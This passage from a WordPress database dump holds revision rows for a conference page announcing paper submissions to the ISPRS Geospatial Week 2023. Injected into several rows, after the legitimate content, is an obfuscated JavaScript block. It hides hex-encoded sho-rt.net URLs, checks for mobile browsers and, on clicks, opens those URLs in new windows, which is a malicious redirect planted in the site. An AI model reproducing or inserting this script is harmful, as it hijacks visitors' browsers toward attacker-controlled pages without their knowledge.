)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:24:38','2022-11-25 22:24:38','',2659,'https://gsw2023.com/?p=3368',0,'revision','',0),
(3369,1,'2022-11-25 22:28:29','2022-11-25 22:28:29','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<div class=\"three_quarter first\">\r\n<ul class=\"nospace\">\r\n 	<li style=\"text-align: justify;\">\r\n<h5><strong>The ISPRS Geospatial Week 2023 will be opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2019/\" target=\"_blank\" rel=\"noopener\">ConfTool website of the Geospatial Week</a></strong></h5>\r\n<h5><strong>, authors will be able to submit either a full paper or an extended abstract to one of the following workshops/themes:</strong></h5>\r\n</li>\r\n</ul>\r\n<div class=\"gap-10\"></div>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>-Unmanned Aerial Vehicles in Geomatics (UAV-g)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Laser scanning</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Digital Transformation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Location Based Services (LBS)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Smartphones and wearable devices for LBS</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Sensors for smart and sustainable cities</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-3D Mobile Mapping and GIS Integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Indoor Mobile Mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-LIDAR and SAR Mapping Systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Mobile Mapping Applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Data Fusion of multi-platform Mobile Mapping Technology</strong></h6>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\r\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\r\n\r\n<div class=\"gap-10\"></div>\r\n<h3>Paper submissions deadlines</h3>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\r\n 	<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\r\n 	<li><strong>Abstract author notification: May 2023</strong></li>\r\n 	<li><strong>Full paper Author notification: May 2023</strong></li>\r\n 	<li><strong>Camera ready paper submission: July 2023</strong></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-50\"></div>\r\n<h5 style=\"color: red;\">Useful links:</h5>\r\n<ul class=\"nospace\">\r\n 	<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\r\n 	<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\r\n</ul>\r\n<div id=\"respond\"></div>\r\n</div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:28:29','2022-11-25 22:28:29','',2659,'https://gsw2023.com/?p=3369',0,'revision','',0),
(3370,1,'2022-11-25 22:43:29','2022-11-25 22:43:29','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 